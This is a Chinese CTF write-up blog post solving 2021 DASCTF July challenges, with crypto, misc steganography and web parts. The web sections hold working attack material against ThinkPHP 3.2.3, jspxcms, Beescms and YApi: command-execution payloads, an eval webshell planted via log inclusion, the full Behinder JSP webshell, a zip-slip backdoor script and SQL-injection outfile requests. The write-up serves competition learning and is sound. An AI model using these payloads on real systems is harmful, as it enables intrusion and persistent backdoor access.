CRYPTO

Yusa的密码学签到——BlockTrick

┌──(kali㉿kali)-[~/桌面]
└─$ nc node4.buuoj.cn 25870                                                                                                                                                      1 ⨯
d1930e58ab00552f066efa012f80c17b
d1930e58ab00552f066efa012f80c17b
981baee22bc0cfd2233769fbf32336ce
Try again
981baee22bc0cfd2233769fbf32336ce
flag{30cf1012-e303-4caf-98ba-d63f3591e9cd}

Web

ezrce

Yapi Mock 远程命令执行漏洞

添加项目—>添加接口—>选择高级Mock—>勾选脚本—>将开启按钮打开—>然后将PoC写在脚本中保存

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ls /& cat /ffffffflllllaggggg").toString()

访问预览地址，回显命令执行结果getflag

cat flag

非ascii字符绕过escapeshellarg

<?php

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match('/flag/i',$cmd))
    {
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>

hint提示管理员曾访问过flag，查看日志

1	`?cmd=/var/log/nginx/access.log`

得到flag文件为/this_is_final_flag_e2a457126032b42d.php

1	`?cmd=this_is_final_flag_e2a457126032b42d.php`

过滤了flag关键字，配合escapeshellarg函数绕过：https://www.php.net/manual/zh/function.escapeshellarg.php

当escapeshellarg（）从UTF-8字符串中剥离非ASCII字符时，添加以下内容修复了该问题：

<?php
setlocale(LC_CTYPE, "en_US.UTF-8");
?>
  
 Under Windows, this function puts string into double-quotes, not single, and replaces %(percent sign) with a space, that's why it's impossible to pass a filename with percents in its name through this function.
 
在Windows下，此函数将字符串放在双引号中，而不是单引号中，并用空格替换%（百分号），这就是为什么无法通过此函数传递名称中带有百分数的文件名的原因。

在flag字符之间添加一个非ascii字符，然后unicode绕一下flag正则

1 2	`?cmd=this_is_final_fl%faag_e2a457126032b42d.php #<?php $flag='flag{cb3043a6-bfe6-4c6d-a75e-fc77e27de779}'; ?>`

easythinkphp

ThinkPHP 3.x 日志包含RCE getshell

TP3.2.3日志漏洞:https://www.thinkphp.cn/topic/58651.html

ThinkPHP3.2.x RCE漏洞通报：https://cloud.tencent.com/developer/article/1855060

通过输入http://域名/应用名（默认为Application，很多开发者不会改它）/Runtime/Logs/组名（默认为Home或者Index，很多开发者不会改它）/18_08_15.log的方式即可访问日志文件

POC

写入phpinfo()
GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: c1855537-eb23-4ca1-9dfc-e67ffdcc8092.node4.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3nctjnqfd39jl28bg59mnaf2b5
Upgrade-Insecure-Requests: 1

  
查看日志，注意日志时间
GET /index.php/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_02.log

上shell
GET /index.php?m=--><?=@eval($_POST["atkx"]);?>

蚁剑连接：
http://c1855537-eb23-4ca1-9dfc-e67ffdcc8092.node4.buuoj.cn/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_02.log
pass：atkx

蚁剑连接成功

ThinkphpGUI工具getshell

jspxcms

jspxcms解压getshell漏洞

https://lockcy.github.io/2019/10/18/%E5%A4%8D%E7%8E%B0jspxcms%E8%A7%A3%E5%8E%8Bgetshell%E6%BC%8F%E6%B4%9E/

admin空密码登录后台，进入后台管理页面：/cmscp/index.do找到漏洞存在的功能页面。

这里用冰蝎自带的马shell.jsp

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

生成war，把shell.jsp和jar.exe放至同一目录下

1	`jar cf shell.war *`

所以选择脚本写入

import zipfile

z = zipfile.ZipFile('test.zip', 'w', zipfile.ZIP_DEFLATED)
with open('shell.war','rb') as f:
    temp=f.read()

z.writestr('../../../shell.war',temp)  #shell.war为上一步生产的后门war包
z.close()
    
      
      
import zipfile

f=open('cmd.war','rb')
binary=f.read()
f.close()
binary1 = b'123123'
zipFile = zipfile.ZipFile("tests.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("tests.zip")
zipFile.writestr("../../../shells.war", binary)
zipFile.close()

上传生成的test.zip

注意解压，然后冰蝎连接

http://1a43c8c7-96d5-4a35-b0f8-69a5152f2a2c.node4.buuoj.cn/shell/shell.jsp

pass：rebeyond

cybercms

Beescms_v4.0 sql注入漏洞分析

后台注入outfile :https://www.cnblogs.com/yuzly/p/11423384.html

/www.zip 下载源码是beescms，/var/www/html/

sql注入outfile写webshell，过滤了空格，用然/**/代替，后连接webshell

POST /admin/login.php?action=ck_login HTTP/1.1
Host: 3138db70-ea68-4bad-8cb4-0c6e63b7894b.node4.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Origin: http://3138db70-ea68-4bad-8cb4-0c6e63b7894b.node4.buuoj.cn
Connection: close
Referer: http://3138db70-ea68-4bad-8cb4-0c6e63b7894b.node4.buuoj.cn/admin/login.php
Cookie: PHPSESSID=om10447imss7jbttdpjm5lsf24
Upgrade-Insecure-Requests: 1

user=admin'/**/union/**/selselectect/**/1,0x3c3f3d406576616c28245f504f53545b2761746b78275d293f3e,3,4,5/**/into/**/outoutfilefile/**/'/var/www/html/atkx.php'#&password=123456&code=&submit=true&submit.x=47&submit.y=-3

蚁剑连接成功getflag

jj’s camera

00截断

POST /qbl.php?id=1.php%0012312312321321&url=http://baidu.com HTTP/1.1
Host: hnode4.buuoj.cn:27281
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://hnode4.buuoj.cn:27281/sc.php?id=12312312321321&url=http://baidu.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Connection: close
Upgrade-Insecure-Requests: 1

img=data%3Aimage%2Fpng%3Bbase64%2CR0lGODk8P3BocApwaHBpbmZvKCk7CkBldmFsKCRfUE9TVFsxXSk7

MISC

ezSteganography

┌──(kali㉿kali)-[~/桌面]
└─$ zsteg -E "b1,g,lsb,xy" ezSteganography-flag.png > out.png



First part of flag is:flag{2e9ec6480d0515
QIM quantization is useful to get another flag.step is 20

QIM量化

from PIL import Image
from Crypto.Util import number
import random
import time
import numpy as np
import matplotlib.pyplot as plt

def extract(delta,y):
	out=[]
	for i in (delta/2-y%delta):
		if i>0:
			out.append(1)
		else:
			out.append(0)
	out=np.array(out)
	return out

p=np.array(Image.open('ezSteganography-flag.png'))
R,G,B=p[:,:,0],p[:,:,1],p[:,:,2]
G=G.ravel()

te_out=extract(20,G)
plt.imshow(np.array(te_out).reshape(1440,2560))
plt.show()

得到另一半flag

red_vs_blue

红队和蓝队将开展66轮对抗，你能预测出每轮对抗的结果吗？

exp：

from pwn import *       #需要用到pwntools模块
context.log_level = 'debug'
io = remote('node4.buuoj.cn', 25900)        #连接，相当于nc，注：25900是端口，每一次开靶机基本上都不同
payload = ['r'] * 66    #先把答案设置成66个‘r’
restart = 1
while restart:
    restart = 0        #先把restart改为0，避免死循环
    for i in range(66):        #循环发送答案
        io.recvuntil('choose one [r] Red Team,[b] Blue Team:')        #接收函数，一直接收，直到接收到设定的字符串才进行下一语句
        io.sendline(payload[i])        #发送函数，上传第i个答案
        io.recvuntil('Team')
        io.recvuntil("Team\n")        #因为输入一个答案后会有两个'Team'的字符串，所以接收两个‘Team'后进行下一语句
        p = io.recv(10)        #接收函数，可控制接收的字符数量，这里接收10个字符
        if 'The number' in p:        
            continue        #接收到'The number'则说明这个答案对了，继续进行下一个for语句发送下一个答案
        else:
            io.recvuntil('Play again? (y/n): ')         #如果没有接收到'The number',则第i个答案错误，接收完字符
            payload[i] = 'b'        #将第i个答案改正
            io.sendline('y')        #发送‘y’重新游戏
            restart = 1         #将restart改为1，将会重新while循环
            break
io.interactive()

运行结果

┌──(kali㉿kali)-[~/桌面]
└─$ python3 exp.py                                                                         
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/kali/.cache/.pwntools-cache-3.9/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] A newer version of pwntools is available on pypi (4.7.0.dev0 --> 4.7.0b0).
    Update with: $ pip install -U pwntools==4.7.0b0
[+] Opening connection to node4.buuoj.cn on port 25868: Done
/home/kali/桌面/exp.py:14: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil('choose one [r] Red Team,[b] Blue Team:\n')
/home/kali/桌面/exp.py:16: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendline(list[i])
The number of successful predictions 0
/home/kali/桌面/exp.py:33: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendline('y')
/home/kali/桌面/exp.py:28: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil('choose one [r] Red Team,[b] Blue Team:\n')
The number of successful predictions 1
The number of successful predictions 3
The number of successful predictions 4
The number of successful predictions 9
The number of successful predictions 10
The number of successful predictions 12
The number of successful predictions 13
The number of successful predictions 18
The number of successful predictions 20
The number of successful predictions 22
The number of successful predictions 24
The number of successful predictions 26
The number of successful predictions 28
The number of successful predictions 29
The number of successful predictions 31
The number of successful predictions 32
The number of successful predictions 33
The number of successful predictions 35
The number of successful predictions 38
The number of successful predictions 39
The number of successful predictions 40
The number of successful predictions 41
The number of successful predictions 44
The number of successful predictions 45
The number of successful predictions 46
The number of successful predictions 48
The number of successful predictions 50
The number of successful predictions 53
The number of successful predictions 54
The number of successful predictions 55
The number of successful predictions 58
The number of successful predictions 60
The number of successful predictions 61
The number of successful predictions 66
[*] Closed connection to node4.buuoj.cn port 25868
[+] Flag: flag{b'c069b2d7-0fca-4819-a656-44e4451deaaf'}
[+] Time: 50.63801121711731s

Just a GIF

提取帧数，一共451帧,对比发现11帧一组，一共41组.

把除第1组之后的每一组的第n帧跟第一组的第n帧比较，相同为纯白，不同为纯黑

把同内容的图片作为一个系列，然后系列中的图片与该系列第一张图片比较，新建一张

83x83的空白图，把所有存在像素值不同的位置标记为黑色，即可得到隐藏的11张图片

中的1张，剩下的以此类推即可。

#encoding: utf-8 
import os 
from PIL import Image 

#分离gif 

img=Image.open('Just_a_GIF.gif') 
os.mkdir('./png') 
for i in range(img.n_frames): 
	img.seek(i) 
	new = Image.new("RGB", img.size) 
	new.paste(img) 
	new.save('png\\'+str(i)+'.png') 

    
    
#处理分离出来的png 
os.mkdir('./flag') 

path1=r"./flag/" 
path2=r"./png/" 

for i in range(11): 
	img=Image.open(path2+str(i)+'.png') 
	#隐藏的图片尺寸为83*83 
	img1=Image.new('RGB',(83,83),(255,255,255)) 
	#图片每帧跟同内容的第一帧进行像素比较，不同处用黑色，叠加起来 
	for h in range(40): 
		im=Image.open(path2+str((h+1)*11+i)+'.png') 
		width,height=img.size 
		for j in range(0,width):
			for k in range(0,height): 
				tmp = img.getpixel((j,k)) 
				tmp1 = im.getpixel((j,k)) 
				if tmp != tmp1: 
					img1.putpixel((j,k),(0,0,0)) 
	img1.save(path1+str(i+1)+'.png')

得到11张图片

按照10和11的顺序拼接得到

DataMatrix：https://demo.dynamsoft.com/barcode-reader/

Nuclear wastewater

小明去日本旅游时，发现了一张被核废水污染过的二维码，你能从中发现什么信息吗。

思路：直接处理图片的三个通道，观察rgb数值，并进行chr，可以发现有大量的重复的内容，猜测可以利用词频进行排序

from PIL import Image

pic = Image.open('Nuclear wastewater.png')
a, b = pic.size
list1 = []  #将三个像素值都存入列表元素
for y in range(0,b,10):
    for x in range(0, a, 10):
        pixel = pic.getpixel((x, y))
        if pixel == (255, 255, 255):
             continue
        r, g, b1 = pixel
        list1.extend([r, g, b1])
#print(list1)

dic1 = {}
for i in list1:
    dic1[i] = dic1.get(i, 0) + 1
result = sorted(dic1.items(), key=lambda x: x[1], reverse=True)
for s in result:
    print(chr(s[0]), end='')

得到

1 2	`theKEYis:#R@/&p~!(▒?£ñ$ªVJÞÍFjÀÈ÷¢©¼§UÌ¦õ±·ðäôÉCS 2ÚHÏ>Á`

得到口令#R@/&p~!，解压得到flag.txt

有猫腻，vim查看一下

零宽字节隐写，包含200C、200D、200E，

解题工具：https://330k.github.io/misc_tools/unicode_steganography.html

先在下面设置一下，勾选零宽字符：

U+200C ZERO WIDTH NON-JOINER
U+200D ZERO WIDTH JOINER
U+200E LEFT-TO-RIGHT MARK

根据提示Citrix CTX1解密

OIENKMAJOLEOKMAJOHECLHBCPGFDLNBIPAFFLPBKPIFNLEBBPPFKLFBAPEFBLJBMPHFCLEBBPMFJLEBBPLFOLHBCPCFHLNBIPDFGLHBCPPFKLIBNPHFCLDBGPGFDLBBEPPFKLHBCPPFKLMBJPDFGLCBHPHFCLBBEPIFNLNBIPOFLLMBJPDFGLBBEPEFBLBBEPPFKLGBDPOFLLABFPMFJLABFPCFHLNBIPDFGLMBJPEFBLIBNPHFCLLBOPOFLLBBEPIFNLDBGPAFFKAAFOPEKKDAGOGEDKJAMOAEFKLAOOIENLIBNPEFBLLBOPJFMLFBAPLFOLFBAPNFILEBBPLFOLFBAPAFFLJBMPHFCLJBMPBFELIBNPHFCLIBNPNFILBBEPPFKKPAKOHECKMAJOAEFKKAPOIENKFAAOLEOKHACOPEKKAAFOPEKKAAFOFEAKJAMOHECKLAOODEGKMAJOAEFKPAKONEIKBAEOIENKAAFODEGKAAFOPEKKLAOOOELKJAMOAEFKGADOFEAKEABOLEOKOALOLEOKJAMOAEFKIANOLEOKIANOEEBKFAAOHECKBAEOIENKJAMOKEPKMAJPMFJLCBHPEFBLNBI

解码两次得到flag

CTF 比赛复现

Write up

本博客所有文章除特别声明外，均采用 CC BY-SA 4.0 协议，转载请注明出处！

RCTS CERT CTF2021 上一篇

PHP伪随机数漏洞下一篇

2021DASCTF July X CBCTF 4th